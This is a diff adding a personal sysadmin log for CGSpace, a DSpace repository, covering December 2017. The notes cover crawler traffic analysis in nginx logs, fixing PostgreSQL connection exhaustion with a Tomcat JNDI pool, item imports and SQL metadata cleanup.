+<li>Linode alerted this morning that there was high outbound traffic from 6 to 8 AM</li>
+<li>The XMLUI logs show that the CORE bot from last night (137.108.70.7) is very active still:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;18/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+    190 207.46.13.146
+    191 197.210.168.174
+    202 86.101.203.216
+    268 157.55.39.134
+    297 66.249.66.91
+    314 213.55.99.121
+    402 66.249.66.90
+    532 68.180.229.254
+    644 104.196.152.243
+  32220 137.108.70.7
+</code></pre><ul>
+<li>On the API side (REST and OAI) there is still the same CIAT bot (45.5.184.196) from last night making quite a number of requests this morning:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;18/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+      7 104.198.9.108
+      8 185.29.8.111
+      8 40.77.167.176
+      9 66.249.66.91
+      9 68.180.229.254
+     10 157.55.39.134
+     15 66.249.66.90
+     59 104.196.152.243
+   4014 70.32.83.92
+   8619 45.5.184.196
+</code></pre><ul>
+<li>I need to keep an eye on this issue because it has nice fixes for reducing the number of database connections in DSpace 5.7: <a href="https://jira.duraspace.org/browse/DS-3551">https://jira.duraspace.org/browse/DS-3551</a></li>
+<li>Update text on CGSpace about page to give some tips to developers about using the resources more wisely (<a href="https://github.com/ilri/DSpace/pull/352">#352</a>)</li>
+<li>Linode alerted that CGSpace was using 396.3% CPU from 12 to 2 PM</li>
+<li>The REST and OAI API logs look pretty much the same as earlier this morning, but there&rsquo;s a new IP harvesting XMLUI:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;18/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail            
+    360 95.108.181.88
+    477 66.249.66.90
+    526 86.101.203.216
+    691 207.46.13.13
+    698 197.210.168.174
+    819 207.46.13.146
+    878 68.180.229.254
+   1965 104.196.152.243
+  17701 2.86.72.181
+  52532 137.108.70.7
+</code></pre><ul>
+<li>2.86.72.181 appears to be from Greece, and has the following user agent:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/3.0 (compatible; Indy Library)
+</code></pre><ul>
+<li>Surprisingly it seems they are re-using their Tomcat session for all those 17,000 requests:</li>
+</ul>
+<pre tabindex="0"><code>$ grep 2.86.72.181 dspace.log.2017-12-18 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l                                                                                          
+1
+</code></pre><ul>
+<li>I guess there&rsquo;s nothing I can do to them for now</li>
+<li>In other news, I am curious how many PostgreSQL connection pool errors we&rsquo;ve had in the last month:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c &#34;Cannot get a connection, pool error Timeout waiting for idle object&#34; dspace.log.2017-1* | grep -v :0
+dspace.log.2017-11-07:15695
+dspace.log.2017-11-08:135
+dspace.log.2017-11-17:1298
+dspace.log.2017-11-26:4160
+dspace.log.2017-11-28:107
+dspace.log.2017-11-29:3972
+dspace.log.2017-12-01:1601
+dspace.log.2017-12-02:1274
+dspace.log.2017-12-07:2769
+</code></pre><ul>
+<li>I made a small fix to my <code>move-collections.sh</code> script so that it handles the case when a &ldquo;to&rdquo; or &ldquo;from&rdquo; community doesn&rsquo;t exist</li>
+<li>The script lives here: <a href="https://gist.github.com/alanorth/e60b530ed4989df0c731afbb0c640515">https://gist.github.com/alanorth/e60b530ed4989df0c731afbb0c640515</a></li>
+<li>Major reorganization of four of CTA&rsquo;s French collections</li>
+<li>Basically moving their items into the English ones, then moving the English ones to the top-level of the CTA community, and deleting the old sub-communities</li>
+<li>Move collection 10568/51821 from 10568/42212 to 10568/42211</li>
+<li>Move collection 10568/51400 from 10568/42214 to 10568/42211</li>
+<li>Move collection 10568/56992 from 10568/42216 to 10568/42211</li>
+<li>Move collection 10568/42218 from 10568/42217 to 10568/42211</li>
+<li>Export CSV of collection 10568/63484 and move items to collection 10568/51400</li>
+<li>Export CSV of collection 10568/64403 and move items to collection 10568/56992</li>
+<li>Export CSV of collection 10568/56994 and move items to collection 10568/42218</li>
+<li>There are blank lines in this metadata, which causes DSpace to not detect changes in the CSVs</li>
+<li>I had to use OpenRefine to remove all columns from the CSV except <code>id</code> and <code>collection</code>, and then update the <code>collection</code> field for the new mappings</li>
+<li>Remove empty sub-communities: 10568/42212, 10568/42214, 10568/42216, 10568/42217</li>
+<li>I was in the middle of applying the metadata imports on CGSpace and the system ran out of PostgreSQL connections&hellip;</li>
+<li>There were 128 PostgreSQL connections at the time&hellip; grrrr.</li>
+<li>So I restarted Tomcat 7 and restarted the imports</li>
+<li>I assume the PostgreSQL transactions were fine but I will remove the Discovery index for their community and re-run the light-weight indexing to hopefully re-construct everything:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace index-discovery -r 10568/42211
+$ schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery
+</code></pre><ul>
+<li>The PostgreSQL issues are getting out of control, I need to figure out how to enable connection pools in Tomcat!</li>
+</ul>
+<h2 id="2017-12-19">2017-12-19</h2>
+<ul>
+<li>Briefly had PostgreSQL connection issues on CGSpace for the millionth time</li>
+<li>I&rsquo;m fucking sick of this!</li>
+<li>The connection graph on CGSpace shows shit tons of connections idle</li>
+</ul>
+<p><img src="/cgspace-notes/2017/12/postgres-connections-month-cgspace-2.png" alt="Idle PostgreSQL connections on CGSpace"></p>
+<ul>
+<li>And I only now just realized that DSpace&rsquo;s <code>db.maxidle</code> parameter is not seconds, but number of idle connections to allow.</li>
+<li>So theoretically, because each webapp has its own pool, this could be 20 per app—so no wonder we have 50 idle connections!</li>
+<li>I notice that this number will be set to 10 by default in DSpace 6.1 and 7.0: <a href="https://jira.duraspace.org/browse/DS-3564">https://jira.duraspace.org/browse/DS-3564</a></li>
+<li>So I&rsquo;m going to reduce ours from 20 to 10 and start trying to figure out how the hell to supply a database pool using Tomcat JNDI</li>
+<li>I re-deployed the <code>5_x-prod</code> branch on CGSpace, applied all system updates, and restarted the server</li>
+<li>Looking through the dspace.log I see this error:</li>
+</ul>
+<pre tabindex="0"><code>2017-12-19 08:17:15,740 ERROR org.dspace.statistics.SolrLogger @ Error CREATEing SolrCore &#39;statistics-2010&#39;: Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
+</code></pre><ul>
+<li>I don&rsquo;t have time now to look into this but the Solr sharding has long been an issue!</li>
+<li>Looking into using JDBC / JNDI to provide a database pool to DSpace</li>
+<li>The <a href="https://wiki.lyrasis.org/display/DSDOC6x/Configuration+Reference">DSpace 6.x configuration docs</a> have more notes about setting up the database pool than the 5.x ones (which actually have none!)</li>
+<li>First, I uncomment <code>db.jndi</code> in <em>dspace/config/dspace.cfg</em></li>
+<li>Then I create a global <code>Resource</code> in the main Tomcat <em>server.xml</em> (inside <code>GlobalNamingResources</code>):</li>
+</ul>
+<pre tabindex="0"><code>&lt;Resource name=&#34;jdbc/dspace&#34; auth=&#34;Container&#34; type=&#34;javax.sql.DataSource&#34;
+	  driverClassName=&#34;org.postgresql.Driver&#34;
+	  url=&#34;jdbc:postgresql://localhost:5432/dspace&#34;
+	  username=&#34;dspace&#34;
+	  password=&#34;dspace&#34;
+      initialSize=&#39;5&#39;
+      maxActive=&#39;50&#39;
+      maxIdle=&#39;15&#39;
+      minIdle=&#39;5&#39;
+      maxWait=&#39;5000&#39;
+      validationQuery=&#39;SELECT 1&#39;
+      testOnBorrow=&#39;true&#39; /&gt;
+</code></pre><ul>
+<li>Most of the parameters are from comments by Mark Wood about his JNDI setup: <a href="https://jira.duraspace.org/browse/DS-3564">https://jira.duraspace.org/browse/DS-3564</a></li>
+<li>Then I add a <code>ResourceLink</code> to each web application context:</li>
+</ul>
+<pre tabindex="0"><code>&lt;ResourceLink global=&#34;jdbc/dspace&#34; name=&#34;jdbc/dspace&#34; type=&#34;javax.sql.DataSource&#34;/&gt;
+</code></pre><ul>
+<li>I am not sure why several guides show configuration snippets for <em>server.xml</em> and web application contexts that use a Local and Global jdbc&hellip;</li>
+<li>When DSpace can&rsquo;t find the JNDI context (for whatever reason) you will see this in the dspace logs:</li>
+</ul>
+<pre tabindex="0"><code>2017-12-19 13:12:08,796 ERROR org.dspace.storage.rdbms.DatabaseManager @ Error retrieving JNDI context: jdbc/dspace
+javax.naming.NameNotFoundException: Name [jdbc/dspace] is not bound in this Context. Unable to find [jdbc].
+        at org.apache.naming.NamingContext.lookup(NamingContext.java:825)
+        at org.apache.naming.NamingContext.lookup(NamingContext.java:173)
+        at org.dspace.storage.rdbms.DatabaseManager.initDataSource(DatabaseManager.java:1414)
+        at org.dspace.storage.rdbms.DatabaseManager.initialize(DatabaseManager.java:1331)
+        at org.dspace.storage.rdbms.DatabaseManager.getDataSource(DatabaseManager.java:648)
+        at org.dspace.storage.rdbms.DatabaseManager.getConnection(DatabaseManager.java:627)
+        at org.dspace.core.Context.init(Context.java:121)
+        at org.dspace.core.Context.&lt;init&gt;(Context.java:95)
+        at org.dspace.app.util.AbstractDSpaceWebapp.register(AbstractDSpaceWebapp.java:79)
+        at org.dspace.app.util.DSpaceContextListener.contextInitialized(DSpaceContextListener.java:128)
+        at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:5110)
+        at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5633)
+        at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:145)
+        at org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase.java:1015)
+        at org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:991)
+        at org.apache.catalina.core.StandardHost.addChild(StandardHost.java:652)
+        at org.apache.catalina.startup.HostConfig.deployDescriptor(HostConfig.java:712)
+        at org.apache.catalina.startup.HostConfig$DeployDescriptor.run(HostConfig.java:2002)
+        at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
+        at java.util.concurrent.FutureTask.run(FutureTask.java:266)
+        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
+        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
+        at java.lang.Thread.run(Thread.java:748)
+2017-12-19 13:12:08,798 INFO  org.dspace.storage.rdbms.DatabaseManager @ Unable to locate JNDI dataSource: jdbc/dspace
+2017-12-19 13:12:08,798 INFO  org.dspace.storage.rdbms.DatabaseManager @ Falling back to creating own Database pool
+</code></pre><ul>
+<li>And indeed the Catalina logs show that it failed to set up the JDBC driver:</li>
+</ul>
+<pre tabindex="0"><code>org.apache.tomcat.dbcp.dbcp.SQLNestedException: Cannot load JDBC driver class &#39;org.postgresql.Driver&#39;
+</code></pre><ul>
+<li>There are several copies of the PostgreSQL driver installed by DSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ find ~/dspace/ -iname &#34;postgresql*jdbc*.jar&#34;
+/Users/aorth/dspace/webapps/jspui/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
+/Users/aorth/dspace/webapps/oai/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
+/Users/aorth/dspace/webapps/xmlui/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
+/Users/aorth/dspace/webapps/rest/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar
+/Users/aorth/dspace/lib/postgresql-9.1-901-1.jdbc4.jar
+</code></pre><ul>
+<li>These apparently come from the main DSpace <code>pom.xml</code>:</li>
+</ul>
+<pre tabindex="0"><code>&lt;dependency&gt;
+   &lt;groupId&gt;postgresql&lt;/groupId&gt;
+   &lt;artifactId&gt;postgresql&lt;/artifactId&gt;
+   &lt;version&gt;9.1-901-1.jdbc4&lt;/version&gt;
+&lt;/dependency&gt;
+</code></pre><ul>
+<li>So WTF? Let&rsquo;s try copying one to Tomcat&rsquo;s lib folder and restarting Tomcat:</li>
+</ul>
+<pre tabindex="0"><code>$ cp ~/dspace/lib/postgresql-9.1-901-1.jdbc4.jar /usr/local/opt/tomcat@7/libexec/lib
+</code></pre><ul>
+<li>Oh that&rsquo;s fantastic, now at least Tomcat doesn&rsquo;t print an error during startup so I guess it succeeds to create the JNDI pool</li>
+<li>DSpace starts up but I have no idea if it&rsquo;s using the JNDI configuration because I see this in the logs:</li>
+</ul>
+<pre tabindex="0"><code>2017-12-19 13:26:54,271 INFO  org.dspace.storage.rdbms.DatabaseManager @ DBMS is &#39;{}&#39;PostgreSQL
+2017-12-19 13:26:54,277 INFO  org.dspace.storage.rdbms.DatabaseManager @ DBMS driver version is &#39;{}&#39;9.5.10
+2017-12-19 13:26:54,293 INFO  org.dspace.storage.rdbms.DatabaseUtils @ Loading Flyway DB migrations from: filesystem:/Users/aorth/dspace/etc/postgres, classpath:org.dspace.storage.rdbms.sqlmigration.postgres, classpath:org.dspace.storage.rdbms.migration
+2017-12-19 13:26:54,306 INFO  org.flywaydb.core.internal.dbsupport.DbSupportFactory @ Database: jdbc:postgresql://localhost:5432/dspacetest (PostgreSQL 9.5)
+</code></pre><ul>
+<li>Let&rsquo;s try again, but this  time explicitly blank the PostgreSQL connection parameters in dspace.cfg and see if DSpace starts&hellip;</li>
+<li>Wow, ok, that works, but having to copy the PostgreSQL JDBC JAR to Tomcat&rsquo;s lib folder totally blows</li>
+<li>Also, it&rsquo;s likely this is only a problem on my local macOS + Tomcat test environment</li>
+<li>Ubuntu&rsquo;s Tomcat distribution will probably handle this differently</li>
+<li>So for reference I have:
+<ul>
+<li>a <code>&lt;Resource&gt;</code> defined globally in server.xml</li>
+<li>a <code>&lt;ResourceLink&gt;</code> defined in each web application&rsquo;s context XML</li>
+<li>unset the <code>db.url</code>, <code>db.username</code>, and <code>db.password</code> parameters in dspace.cfg</li>
+<li>set the <code>db.jndi</code> in dspace.cfg to the name specified in the web application context</li>
+</ul>
+</li>
+<li>After adding the <code>Resource</code> to <em>server.xml</em> on Ubuntu I get this in Catalina&rsquo;s logs:</li>
+</ul>
+<pre tabindex="0"><code>SEVERE: Unable to create initial connections of pool.
+java.sql.SQLException: org.postgresql.Driver
+...
+Caused by: java.lang.ClassNotFoundException: org.postgresql.Driver
+</code></pre><ul>
+<li>The username and password are correct, but maybe I need to copy the fucking lib there too?</li>
+<li>I tried installing Ubuntu&rsquo;s <code>libpostgresql-jdbc-java</code> package but Tomcat still can&rsquo;t find the class</li>
+<li>Let me try to symlink the lib into Tomcat&rsquo;s libs:</li>
+</ul>
+<pre tabindex="0"><code># ln -sv /usr/share/java/postgresql.jar /usr/share/tomcat7/lib
+</code></pre><ul>
+<li>Now Tomcat starts but the localhost container has errors:</li>
+</ul>
+<pre tabindex="0"><code>SEVERE: Exception sending context initialized event to listener instance of class org.dspace.app.util.DSpaceContextListener
+java.lang.AbstractMethodError: Method org/postgresql/jdbc3/Jdbc3ResultSet.isClosed()Z is abstract
+</code></pre><ul>
+<li>Could be a version issue or something since the Ubuntu package provides 9.2 and DSpace&rsquo;s are 9.1&hellip;</li>
+<li>Let me try to remove it and copy in DSpace&rsquo;s:</li>
+</ul>
+<pre tabindex="0"><code># rm /usr/share/tomcat7/lib/postgresql.jar
+# cp [dspace]/webapps/xmlui/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar /usr/share/tomcat7/lib/
+</code></pre><ul>
+<li>Wow, I think that actually works&hellip;</li>
+<li>I wonder if I could get the JDBC driver from postgresql.org instead of relying on the one from the DSpace build: <a href="https://jdbc.postgresql.org/">https://jdbc.postgresql.org/</a></li>
+<li>I notice our version is 9.1-901, which isn&rsquo;t even available anymore! The latest in the archived versions is 9.1-903</li>
+<li>Also, since I commented out all the db parameters in DSpace.cfg, how does the command line <code>dspace</code> tool work?</li>
+<li>Let&rsquo;s try the upstream JDBC driver first:</li>
+</ul>
+<pre tabindex="0"><code># rm /usr/share/tomcat7/lib/postgresql-9.1-901-1.jdbc4.jar
+# wget https://jdbc.postgresql.org/download/postgresql-42.1.4.jar -O /usr/share/tomcat7/lib/postgresql-42.1.4.jar
+</code></pre><ul>
+<li>DSpace command line fails unless db settings are present in dspace.cfg:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace database info
+Caught exception:
+java.sql.SQLException: java.lang.ClassNotFoundException: 
+        at org.dspace.storage.rdbms.DataSourceInit.getDatasource(DataSourceInit.java:171)
+        at org.dspace.storage.rdbms.DatabaseManager.initDataSource(DatabaseManager.java:1438)
+        at org.dspace.storage.rdbms.DatabaseUtils.main(DatabaseUtils.java:81)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+Caused by: java.lang.ClassNotFoundException: 
+        at java.lang.Class.forName0(Native Method)
+        at java.lang.Class.forName(Class.java:264)
+        at org.dspace.storage.rdbms.DataSourceInit.getDatasource(DataSourceInit.java:41)
+        ... 8 more
+</code></pre><ul>
+<li>And in the logs:</li>
+</ul>
+<pre tabindex="0"><code>2017-12-19 18:26:56,971 ERROR org.dspace.storage.rdbms.DatabaseManager @ Error retrieving JNDI context: jdbc/dspace
+javax.naming.NoInitialContextException: Need to specify class name in environment or system property, or as an applet parameter, or in an application resource file:  java.naming.factory.initial
+        at javax.naming.spi.NamingManager.getInitialContext(NamingManager.java:662)
+        at javax.naming.InitialContext.getDefaultInitCtx(InitialContext.java:313)
+        at javax.naming.InitialContext.getURLOrDefaultInitCtx(InitialContext.java:350)
+        at javax.naming.InitialContext.lookup(InitialContext.java:417)
+        at org.dspace.storage.rdbms.DatabaseManager.initDataSource(DatabaseManager.java:1413)
+        at org.dspace.storage.rdbms.DatabaseUtils.main(DatabaseUtils.java:81)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
+2017-12-19 18:26:56,983 INFO  org.dspace.storage.rdbms.DatabaseManager @ Unable to locate JNDI dataSource: jdbc/dspace
+2017-12-19 18:26:56,983 INFO  org.dspace.storage.rdbms.DatabaseManager @ Falling back to creating own Database pool
+2017-12-19 18:26:56,992 WARN  org.dspace.core.ConfigurationManager @ Warning: Number format error in property: db.maxconnections
+2017-12-19 18:26:56,992 WARN  org.dspace.core.ConfigurationManager @ Warning: Number format error in property: db.maxwait
+2017-12-19 18:26:56,993 WARN  org.dspace.core.ConfigurationManager @ Warning: Number format error in property: db.maxidle
+</code></pre><ul>
+<li>If I add the db values back to dspace.cfg the <code>dspace database info</code> command succeeds but the log still shows errors retrieving the JNDI connection</li>
+<li>Perhaps something to report to the dspace-tech mailing list when I finally send my comments</li>
+<li>Oh cool! <code>select * from pg_stat_activity</code> shows &ldquo;PostgreSQL JDBC Driver&rdquo; for the application name! That&rsquo;s how you know it&rsquo;s working!</li>
+<li>If you monitor the <code>pg_stat_activity</code> while you run <code>dspace database info</code> you can see that it doesn&rsquo;t use the JNDI and creates ~9 extra PostgreSQL connections!</li>
+<li>And in the middle of all of this Linode sends an alert that CGSpace has high CPU usage from 2 to 4 PM</li>
+</ul>
+<h2 id="2017-12-20">2017-12-20</h2>
+<ul>
+<li>The database connection pooling is definitely better!</li>
+</ul>
+<p><img src="/cgspace-notes/2017/12/postgres-connections-week-dspacetest.png" alt="PostgreSQL connection pooling on DSpace Test"></p>
+<ul>
+<li>Now there is only one set of idle connections shared among all the web applications, instead of 10+ per application</li>
+<li>There are short bursts of connections up to 10, but it generally stays around 5</li>
+<li>Test and import 13 records to CGSpace for Abenet:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
+$ dspace import -a -e aorth@mjanja.ch -s /home/aorth/cg_system_20Dec/SimpleArchiveFormat -m systemoffice.map &amp;&gt; systemoffice.log
+</code></pre><ul>
+<li>The fucking database went from 47 to 72 to 121 connections while I was importing so it stalled.</li>
+<li>Since I had to restart Tomcat anyways, I decided to just deploy the new JNDI connection pooling stuff on CGSpace</li>
+<li>There was an initial connection storm of 50 PostgreSQL connections, but then it settled down to 7</li>
+<li>After that CGSpace came up fine and I was able to import the 13 items just fine:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace import -a -e aorth@mjanja.ch -s /home/aorth/cg_system_20Dec/SimpleArchiveFormat -m systemoffice.map &amp;&gt; systemoffice.log
+$ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -i 10568/89287
+</code></pre><ul>
+<li>The final code for the JNDI work in the Ansible infrastructure scripts is here: <a href="https://github.com/ilri/rmg-ansible-public/commit/1959d9cb7a0e7a7318c77f769253e5e029bdfa3b">https://github.com/ilri/rmg-ansible-public/commit/1959d9cb7a0e7a7318c77f769253e5e029bdfa3b</a></li>
+</ul>
+<h2 id="2017-12-24">2017-12-24</h2>
+<ul>
+<li>Linode alerted that CGSpace was using high CPU this morning around 6 AM</li>
+<li>I&rsquo;m playing with reading all of a month&rsquo;s nginx logs into goaccess:</li>
+</ul>
+<pre tabindex="0"><code># find /var/log/nginx -type f -newermt &#34;2017-12-01&#34; | xargs zcat --force | goaccess --log-format=COMBINED -
+</code></pre><ul>
+<li>I can see interesting things using this approach, for example:
+<ul>
+<li>50.116.102.77 checked our status almost 40,000 times so far this month—I think it&rsquo;s the CGNet uptime tool</li>
+<li>Also, we&rsquo;ve handled 2.9 million requests this month from 172,000 unique IP addresses!</li>
+<li>Total bandwidth so far this month is 640GiB</li>
+<li>The user that made the most requests so far this month is 45.5.184.196 (267,000 requests)</li>
+</ul>
+</li>
+</ul>
+<h2 id="2017-12-25">2017-12-25</h2>
+<ul>
+<li>The PostgreSQL connection pooling is much better when using the Tomcat JNDI pool</li>
+<li>Here are the Munin stats for the past week on CGSpace:</li>
+</ul>
+<p><img src="/cgspace-notes/2017/12/postgres-connections-cgspace.png" alt="CGSpace PostgreSQL connections week"></p>
+<h2 id="2017-12-29">2017-12-29</h2>
+<ul>
+<li>Looking at some old notes for metadata to clean up, I found a few hundred corrections in <code>cg.fulltextstatus</code> and <code>dc.language.iso</code>:</li>
+</ul>
+<pre tabindex="0"><code># update metadatavalue set text_value=&#39;Formally Published&#39; where resource_type_id=2 and metadata_field_id=214 and text_value like &#39;Formally published&#39;;
+UPDATE 5
+# delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like &#39;NO&#39;;
+DELETE 17
+# update metadatavalue set text_value=&#39;en&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(En|English)&#39;;
+UPDATE 49
+# update metadatavalue set text_value=&#39;fr&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(fre|frn|French)&#39;;
+UPDATE 4
+# update metadatavalue set text_value=&#39;es&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(Spanish|spa)&#39;;
+UPDATE 16
+# update metadatavalue set text_value=&#39;vi&#39; where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;Vietnamese&#39;;
+UPDATE 9
+# update metadatavalue set text_value=&#39;ru&#39; where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;Ru&#39;;
+UPDATE 1
+# update metadatavalue set text_value=&#39;in&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(IN|In)&#39;;
+UPDATE 5
+# delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(dc.language.iso|CGIAR Challenge Program on Water and Food)&#39;;
+DELETE 20
+</code></pre><ul>
+<li>I need to figure out why we have records with language <code>in</code> because that&rsquo;s not a language!</li>
+</ul>
+<h2 id="2017-12-30">2017-12-30</h2>
+<ul>
+<li>Linode alerted that CGSpace was using 259% CPU from 4 to 6 AM</li>
+<li>Uptime Robot noticed that the server went down for 1 minute a few hours later, around 9AM</li>
+<li>Here&rsquo;s the XMLUI logs:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;30/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
+    637 207.46.13.106
+    641 157.55.39.186
+    715 68.180.229.254
+    924 104.196.152.243
+   1012 66.249.64.95
+   1060 216.244.66.245
+   1120 54.175.208.220
+   1287 66.249.64.93
+   1586 66.249.64.78
+   3653 66.249.64.91
+</code></pre><ul>
+<li>Looks pretty normal actually, but I don&rsquo;t know who 54.175.208.220 is</li>
+<li>They identify as &ldquo;com.plumanalytics&rdquo;, which Google says is associated with Elsevier</li>
+<li>They only seem to have used one Tomcat session so that&rsquo;s good, I guess I don&rsquo;t need to add them to the Tomcat Crawler Session Manager valve:</li>
+</ul>
+<pre tabindex="0"><code>$ grep 54.175.208.220 dspace.log.2017-12-30 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l          
+1 
+</code></pre><ul>
+<li>216.244.66.245 seems to be moz.com&rsquo;s DotBot</li>
+</ul>
+<h2 id="2017-12-31">2017-12-31</h2>
+<ul>
+<li>I finished working on the 42 records for CCAFS after Magdalena sent the remaining corrections</li>
+<li>After that I uploaded them to CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace import -a -e aorth@mjanja.ch -s /home/aorth/2016\ bulk\ upload\ thumbnails/SimpleArchiveFormat -m ccafs.map &amp;&gt; ccafs.log
+</code></pre>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2017/01/mapping-crazy-duplicate.png b/docs/2017/01/mapping-crazy-duplicate.png
new file mode 100644
index 000000000..2caa7e6ca
Binary files /dev/null and b/docs/2017/01/mapping-crazy-duplicate.png differ
diff --git a/docs/2017/02/cpu-week.png b/docs/2017/02/cpu-week.png
new file mode 100644
index 000000000..405aa7070
Binary files /dev/null and b/docs/2017/02/cpu-week.png differ
diff --git a/docs/2017/02/meminfo_phisical-week.png b/docs/2017/02/meminfo_phisical-week.png
new file mode 100644
index 000000000..0d9e85189
Binary files /dev/null and b/docs/2017/02/meminfo_phisical-week.png differ
diff --git a/docs/2017/03/livestock-theme.png b/docs/2017/03/livestock-theme.png
new file mode 100644
index 000000000..f8e9fe675
Binary files /dev/null and b/docs/2017/03/livestock-theme.png differ
diff --git a/docs/2017/03/thumbnail-cmyk.jpg b/docs/2017/03/thumbnail-cmyk.jpg
new file mode 100644
index 000000000..4281d2a51
Binary files /dev/null and b/docs/2017/03/thumbnail-cmyk.jpg differ
diff --git a/docs/2017/03/thumbnail-srgb.jpg b/docs/2017/03/thumbnail-srgb.jpg
new file mode 100644
index 000000000..7838a847d
Binary files /dev/null and b/docs/2017/03/thumbnail-srgb.jpg differ
diff --git a/docs/2017/04/cplace.png b/docs/2017/04/cplace.png
new file mode 100644
index 000000000..b891cd635
Binary files /dev/null and b/docs/2017/04/cplace.png differ
diff --git a/docs/2017/04/dc-rights.png b/docs/2017/04/dc-rights.png
new file mode 100644
index 000000000..5a511b654
Binary files /dev/null and b/docs/2017/04/dc-rights.png differ
diff --git a/docs/2017/04/openrefine-flagging-duplicates.png b/docs/2017/04/openrefine-flagging-duplicates.png
new file mode 100644
index 000000000..25b729f0a
Binary files /dev/null and b/docs/2017/04/openrefine-flagging-duplicates.png differ
diff --git a/docs/2017/06/wle-theme-test-a.png b/docs/2017/06/wle-theme-test-a.png
new file mode 100644
index 000000000..07cd938e4
